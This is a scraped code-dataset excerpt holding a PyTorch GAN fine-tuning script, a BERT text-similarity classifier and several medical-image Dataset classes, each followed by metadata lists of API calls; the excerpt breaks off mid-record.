f"{ckpt_dir}/Iter1st_Epoch-{epoch}_Step-{i:0>4}.pt",
)
logger.info(f'ITER 1st | EPOCH : {epoch} | STEP : {i:0>4} | >> Save checkpoint ...')
torch.cuda.empty_cache() # added
dist_util.barrier()
logger.info(f"SELCT TOP {_SELECT} Latents")
# min_topk_val, min_topk_idx = torch.topk(torch.tensor(min_loss_store), _SELECT) #previous
min_topk_val, min_topk_idx = torch.topk(torch.tensor(min_loss_store), _SELECT, largest=False)
print("SELECT : ", min_topk_val, min_topk_idx)
# ------------------ Training 2nd --------------
selected_z_geo = sample_z_geo[min_topk_idx]
selected_z_tex = sample_z_tex[min_topk_idx]
selected_z_geo_chunks = torch.split(selected_z_geo, batch, dim=0)
selected_z_tex_chunks = torch.split(selected_z_tex, batch, dim=0)
min_loss = 1000
for epoch in range(iter_2nd):
for i, (z_geo_chunk, z_tex_chunk) in enumerate(zip(selected_z_geo_chunks, selected_z_tex_chunks)):
# training
ddp_net.train()
_, loss = ddp_net(z_tex_chunk, z_geo_chunk)
loss = loss.mean()
ddp_net.zero_grad()
loss.backward()
if gradient_clip_threshold == -1:
pass
else:
torch.nn.utils.clip_grad_norm_(net.generator_trainable.parameters(), gradient_clip_threshold)
logger.info(f'ITER 2nd | EPOCH : {epoch} | STEP : {i:0>4} | LOSS : {loss:.5f}')
# evaluation & save results | save checkpoints
with dist_util.synchronized_ops():
if rank == 0:
if (i == len(selected_z_geo_chunks) - 1) and (epoch == iter_2nd - 1):
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/latest.pt",
)
if i % output_interval == 0:
ddp_net.eval()
with torch.no_grad():
sampled_dst, _ = generate_custom(
net.generator_trainable,
fixed_z_tex, fixed_z_geo, use_mapping=True, mode='layer', camera=eval_camera
)
rgb = sampled_dst[:, :-1]
mask = sampled_dst[:, -1:]
bg = torch.ones(rgb.shape, device=device)
bg *= 0.0001 # for better background
new_dst = rgb*mask + bg*(1-mask)
save_image(
new_dst,
os.path.join(sample_dir, f"Iter2nd_Epoch-{epoch}_Step-{i:0>4}.png"),
nrow=grid_rows,
normalize=True,
range=(-1, 1),
)
logger.info(f'ITER 2nd | EPOCH : {epoch} | STEP : {i:0>4} | >> Save images ...')
if i % save_interval == 0:
if not args.suppress:
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/Iter2nd_Epoch-{epoch}_Step-{i:0>4}.pt",
)
logger.info(f'ITER 2nd | EPOCH : {epoch} | STEP : {i:0>4} | >> Save checkpoint ...')
if loss < min_loss:
min_loss = loss
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/best.pt",
)
torch.cuda.empty_cache()
dist_util.barrier()
logger.info("TRAINING DONE ...")
# Check final results
with dist_util.synchronized_ops():
if rank == 0:
net.eval()
with torch.no_grad():
last_z_geo = torch.randn(n_vis, z_dim, device=device)
last_z_tex = torch.randn(n_vis, z_dim, device=device)
sampled_dst, _ = generate_custom(
net.generator_trainable,
last_z_tex, last_z_geo, use_mapping=True, mode='layer', camera=eval_camera
)
save_image(
sampled_dst,
os.path.join(sample_dir, "params_latest_images.png"),
nrow=grid_rows,
normalize=True,
range=(-1, 1),
)
logger.info("FINISH !")
def launch_training(args): # Multiprocessing spawning function
# Load config and parse the number of GPUs.
if args.pipe:
config = yaml.safe_load(sys.stdin)
else:
with open(args.config_path, 'r') as f:
config = yaml.safe_load(f)
gpus = config['GLOBAL']['gpus']
# In case of single GPU, directly call the training function.
if gpus == 1:
subprocess_fn(0, config, args, None)
return
# Otherwise, launch processes.
print('Launching processes...')
torch.multiprocessing.set_start_method('spawn', force=True)
with tempfile.TemporaryDirectory() as temp_dir:
torch.multiprocessing.spawn(fn=subprocess_fn, args=(config, args, temp_dir), nprocs=gpus)
def parse_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--config_path', type=str, default='experiments/default_dist.yaml')
parser.add_argument('--name', type=str, default='default_dist')
parser.add_argument('--pipe', action='store_true', help='read config from stdin instead of file')
parser.add_argument('--suppress', action='store_true')
return parser.parse_args()
if __name__ == '__main__':
launch_training(parse_args())
|
studio-YAIVERSE/studio-YAIVERSE
|
train_nada.py
|
train_nada.py
|
py
| 13,226 |
python
|
en
|
code
| 20 |
github-code
|
6
|
[
{
"api_name": "model_engine.find_get3d",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "logging.StreamHandler",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "logging.FileHandler",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "time.strftime",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "time.gmtime",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "dist_util.setup_dist",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "torch_utils.custom_ops.verbosity",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "torch_utils.custom_ops",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "nada.YAIverseGAN",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "functional.unfreeze_generator_layers",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "dist_util.get_world_size",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "torch.nn.parallel.DistributedDataParallel",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "dist_util.dev",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "dist_util.dev",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "torch.optim.Adam",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 94,
"usage_type": "attribute"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 102,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "torch.manual_seed",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 109,
"usage_type": "attribute"
},
{
"api_name": "torch.randn",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "torch.Generator",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "torch.nn.utils.clip_grad_norm_",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 154,
"usage_type": "attribute"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "functional.generate_custom",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.save_image",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 179,
"usage_type": "attribute"
},
{
"api_name": "torch.save",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "torch.cuda.empty_cache",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 196,
"usage_type": "attribute"
},
{
"api_name": "dist_util.barrier",
"line_number": 198,
"usage_type": "call"
},
{
"api_name": "torch.topk",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 210,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "torch.nn.utils.clip_grad_norm_",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 229,
"usage_type": "attribute"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 234,
"usage_type": "call"
},
{
"api_name": "torch.save",
"line_number": 237,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "functional.generate_custom",
"line_number": 249,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.save_image",
"line_number": 260,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 262,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 262,
"usage_type": "attribute"
},
{
"api_name": "torch.save",
"line_number": 272,
"usage_type": "call"
},
{
"api_name": "torch.save",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "torch.cuda.empty_cache",
"line_number": 292,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 292,
"usage_type": "attribute"
},
{
"api_name": "dist_util.barrier",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "dist_util.synchronized_ops",
"line_number": 298,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 302,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 303,
"usage_type": "call"
},
{
"api_name": "torch.randn",
"line_number": 304,
"usage_type": "call"
},
{
"api_name": "functional.generate_custom",
"line_number": 305,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.save_image",
"line_number": 310,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 312,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 312,
"usage_type": "attribute"
},
{
"api_name": "yaml.safe_load",
"line_number": 324,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 324,
"usage_type": "attribute"
},
{
"api_name": "yaml.safe_load",
"line_number": 327,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing.set_start_method",
"line_number": 337,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing",
"line_number": 337,
"usage_type": "attribute"
},
{
"api_name": "tempfile.TemporaryDirectory",
"line_number": 338,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing.spawn",
"line_number": 339,
"usage_type": "call"
},
{
"api_name": "torch.multiprocessing",
"line_number": 339,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 344,
"usage_type": "call"
}
] |
32005344445
|
import torch.nn as nn
from transformers import BertModel
from services.text_similarity.settings import Settings
class BERTClassifier(nn.Module):
def __init__(self, freeze_params=False):
super(BERTClassifier, self).__init__()
self.settings = Settings
self.bert = BertModel.from_pretrained(self.settings.checkpoint, return_dict=False)
# adding custom layers according to the problem statement
# self.classifier = nn.Sequential(
# nn.Linear(self.settings.input_dim, self.settings.hidden_dim),
# nn.ReLU(),
# nn.Linear(self.settings.hidden_dim, self.settings.output_dim)
# )
if not freeze_params:
            # freeze all BERT parameters (note: this branch runs when freeze_params is False)
for param in self.bert.parameters():
param.requires_grad = False
self.bert_drop = nn.Dropout(self.settings.dropout)
self.out = nn.Linear(self.settings.input_dim, self.settings.output_dim)
def forward(self, ids, mask, token_type_ids):
o1, o2 = self.bert(
ids,
attention_mask=mask,
token_type_ids=token_type_ids
)
bo = self.bert_drop(o2)
output = self.out(bo)
return output
def print_model_details(self):
# Get all of the model's parameters as a list of tuples.
params = list(self.bert.named_parameters())
        print('The BERT Base Uncased Model has {:} different named parameters.\n'.format(len(params)))
print('==== Embedding Layer ====\n')
for p in params[0:5]:
print("{:<55} {:>12}".format(p[0], str(tuple(p[1].size()))))
print('\n==== First Transformer ====\n')
for p in params[5:21]:
print("{:<55} {:>12}".format(p[0], str(tuple(p[1].size()))))
print('\n==== Output Layer ====\n')
for p in params[-4:]:
print("{:<55} {:>12}".format(p[0], str(tuple(p[1].size()))))
|
R-aryan/Text-Similarity-Using-BERT
|
backend/services/text_similarity/application/ai/model.py
|
model.py
|
py
| 1,945 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torch.nn.Module",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "services.text_similarity.settings.Settings",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "transformers.BertModel.from_pretrained",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "transformers.BertModel",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "torch.nn.Dropout",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 26,
"usage_type": "name"
}
] |
32397358077
|
import os
import random
import numpy as np
import torch
from scipy import ndimage as ndi
from torch.nn import functional as F
from torch.utils.data import Dataset
from my_utils import normalize
class UNetDataset(Dataset):
def __init__(self, data_dir, shape, train, transform):
self.shape = shape
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
self.mask_path = os.path.join(data_dir, 'masks')
self.train = train
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
mask = np.load(os.path.join(self.mask_path, self.sample_files[index]))
mask = mask.astype(np.float32)
if int(self.sample_files[index][-6:-4]) == 0:
rand = random.randrange(3, len(sample) - 3)
sample = sample[rand - 3:rand + 4]
mask = mask[rand]
if self.transform is not None:
sample = self.transform(sample)
sample = np.concatenate((sample[0], sample[1]))
if self.train:
htranslation = random.randint(-10, 10)
vtranslation = random.randint(-10, 10)
angle = random.randint(-10, 10)
sample = ndi.shift(sample, (0, htranslation, vtranslation), mode='nearest')
sample = ndi.rotate(sample, angle, (-1, -2), mode='nearest', reshape=False)
mask = ndi.shift(mask, (htranslation, vtranslation), mode='nearest')
mask = ndi.rotate(mask, angle, (-1, -2), mode='nearest', reshape=False)
if random.randint(0, 1) == 1:
sample = np.flip(sample, -1)
mask = np.flip(mask, -1)
sample = torch.from_numpy(sample[np.newaxis, ...].copy())
sample = F.interpolate(sample, self.shape, mode='bilinear', align_corners=False)
mask = torch.from_numpy(mask[np.newaxis, np.newaxis, ...].copy())
mask = F.interpolate(mask, self.shape, mode='nearest')
mask2 = F.interpolate(mask, scale_factor=0.5, mode='nearest', recompute_scale_factor=False)
mask3 = F.interpolate(mask, scale_factor=0.25, mode='nearest', recompute_scale_factor=False)
return sample[0], mask[0], mask2[0], mask3[0]
class GenesisDataset2D(Dataset):
def __init__(self, data_dir, shape, transform, flip_rate):
self.shape = shape
self.transform = transform
self.flip_rate = flip_rate
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
x = np.load(os.path.join(self.sample_path, self.sample_files[index]))
rand = random.randrange(3, len(x) - 3)
x = x[rand - 3:rand + 4]
if random.random() < self.flip_rate:
x = np.flip(x, -1)
x = normalize(x)
x = np.concatenate((x[0], x[1]))
x = ndi.zoom(x, (1, self.shape[0] / x.shape[1], self.shape[1] / x.shape[2]), order=2, mode="nearest")
y = self.transform(x)
return torch.from_numpy(y.copy().astype(np.float32)), torch.from_numpy(x.copy().astype(np.float32))
class PPos2DDataset(Dataset):
def __init__(self, data_dir, shape, num_classes, transform):
self.shape = shape
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
self.num_classes = num_classes
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
rand = random.randrange(3, len(sample) - 3)
target = (rand - 3) / (len(sample) - 6)
sample = sample[rand - 3:rand + 4]
if self.transform is not None:
sample = self.transform(sample)
sample = np.concatenate((sample[0], sample[1]))
return torch.from_numpy(sample), torch.tensor([target])
class UNetClassifierDataset(Dataset):
def __init__(self, data_dir, train, transform):
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
self.mask_path = os.path.join(data_dir, 'masks')
self.train = train
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
mask = np.load(os.path.join(self.mask_path, self.sample_files[index]))
mask = mask.astype(np.float32)
if self.transform is not None:
sample = self.transform(sample)
if self.train:
htranslation = random.randint(-10, 10)
vtranslation = random.randint(-10, 10)
dtranslation = random.randint(-2, 2)
angle = random.randint(-10, 10)
sample = ndi.shift(sample, (0, dtranslation, htranslation, vtranslation), mode='nearest')
sample = ndi.rotate(sample, angle, (-1, -2), mode='nearest', reshape=False)
mask = ndi.shift(mask, (dtranslation, htranslation, vtranslation), mode='nearest')
mask = ndi.rotate(mask, angle, (-1, -2), mode='nearest', reshape=False)
if random.randint(0, 1) == 1:
sample = np.flip(sample, -1)
mask = np.flip(mask, -1)
mask2 = ndi.zoom(mask, 0.5, order=0, mode='nearest')
mask3 = ndi.zoom(mask, 0.25, order=0, mode='nearest')
return torch.from_numpy(sample.copy()), torch.from_numpy(mask[np.newaxis, ...].copy()), torch.from_numpy(
mask2[np.newaxis, ...].copy()), torch.from_numpy(mask3[np.newaxis, ...].copy()), torch.tensor(
[self.sample_files[index][:5].isdigit()], dtype=torch.float)
# return torch.from_numpy(sample.copy()), torch.from_numpy(mask[np.newaxis, ...].copy()), torch.from_numpy(
# mask2[np.newaxis, ...].copy()), torch.from_numpy(mask3[np.newaxis, ...].copy()), torch.tensor(
# [self.sample_files[index][6:11].isdigit()], dtype=torch.float)
class ClassifierDataset(Dataset):
def __init__(self, data_dir, shape, train, transform=None):
self.shape = shape
self.train = train
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
if train:
self.mask_path = os.path.join(data_dir, 'masks')
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
if self.train and self.sample_files[index][-5] == '1':
mask = np.load(os.path.join(self.mask_path, self.sample_files[index]))
indices = mask.nonzero()
nodule_length = [0, 0, 0]
scale_length = [0, 0, 0]
for i in range(3):
start = np.min(indices[i])
end = np.max(indices[i]) + 1
nodule_length[i] = end - start
while True:
for i in range(3):
while True:
scale_length[i] = round(nodule_length[i] * random.uniform(1, 3))
if scale_length[i] < sample.shape[i]:
break
depth = random.randint(0, sample.shape[0] - scale_length[0])
height = random.randint(0, sample.shape[1] - scale_length[1])
width = random.randint(0, sample.shape[2] - scale_length[2])
if depth > np.max(indices[0]) or depth + scale_length[0] < np.min(indices[0]) or height > np.max(
indices[1]) or height + \
scale_length[1] < np.min(indices[1]) or width > np.max(indices[2]) or width + scale_length[2] < \
np.min(indices[2]):
sample = sample[depth:depth + scale_length[0], height:height + scale_length[1],
width:width + scale_length[2]]
break
if self.transform is not None:
sample = self.transform(sample)
sample = torch.from_numpy(sample[np.newaxis, ...].copy())
sample = F.interpolate(sample, self.shape, mode='trilinear', align_corners=True)
return sample[0], torch.tensor([self.sample_files[index][-5] == '0'], dtype=torch.float)
class PCL2DDataset(Dataset):
def __init__(self, data_dir, shape, transform):
self.shape = shape
self.transform = transform
self.sample_path = os.path.join(data_dir, 'samples')
self.sample_files = os.listdir(self.sample_path)
self.sample_files.sort()
def __len__(self):
return len(self.sample_files)
def __getitem__(self, index):
sample = np.load(os.path.join(self.sample_path, self.sample_files[index]))
rand = random.randrange(3, len(sample) - 3)
slice_position = (rand - 3) / (len(sample) - 6)
partition = int((rand - 3) / (len(sample) - 6) * 4) + 1
sample = sample[rand - 3:rand + 4]
img1 = self.transform(sample)
img2 = self.transform(sample)
img1 = np.concatenate((img1[0], img1[1]))
img2 = np.concatenate((img2[0], img2[1]))
return torch.from_numpy(img1), torch.from_numpy(img2), torch.tensor(slice_position), torch.tensor(partition)
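
# A minimal wiring sketch, assuming a directory laid out as <root>/samples and <root>/masks
# with matching .npy files; the path, shape, batch size and transform are placeholders.
if __name__ == "__main__":
    from torch.utils.data import DataLoader

    dataset = UNetDataset("data/train", shape=(256, 256), train=True, transform=None)
    loader = DataLoader(dataset, batch_size=4, shuffle=True)
    sample, mask, mask2, mask3 = next(iter(loader))
    # masks come back at full, half and quarter resolution for multi-scale supervision
    print(sample.shape, mask.shape, mask2.shape, mask3.shape)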
|
alienzyj/PPos
|
my_dataset.py
|
my_dataset.py
|
py
| 10,080 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torch.utils.data.Dataset",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "numpy.float32",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 57,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 77,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "random.random",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "my_utils.normalize",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.zoom",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 87,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 91,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 94,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 98,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 107,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 107,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 107,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 120,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 123,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 126,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 133,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 133,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 133,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 134,
"usage_type": "attribute"
},
{
"api_name": "numpy.float32",
"line_number": 135,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 143,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 146,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.shift",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 148,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.rotate",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 149,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 152,
"usage_type": "call"
},
{
"api_name": "numpy.flip",
"line_number": 153,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.zoom",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 155,
"usage_type": "name"
},
{
"api_name": "scipy.ndimage.zoom",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage",
"line_number": 156,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 158,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 158,
"usage_type": "attribute"
},
{
"api_name": "numpy.newaxis",
"line_number": 159,
"usage_type": "attribute"
},
{
"api_name": "torch.from_numpy",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "torch.float",
"line_number": 160,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.Dataset",
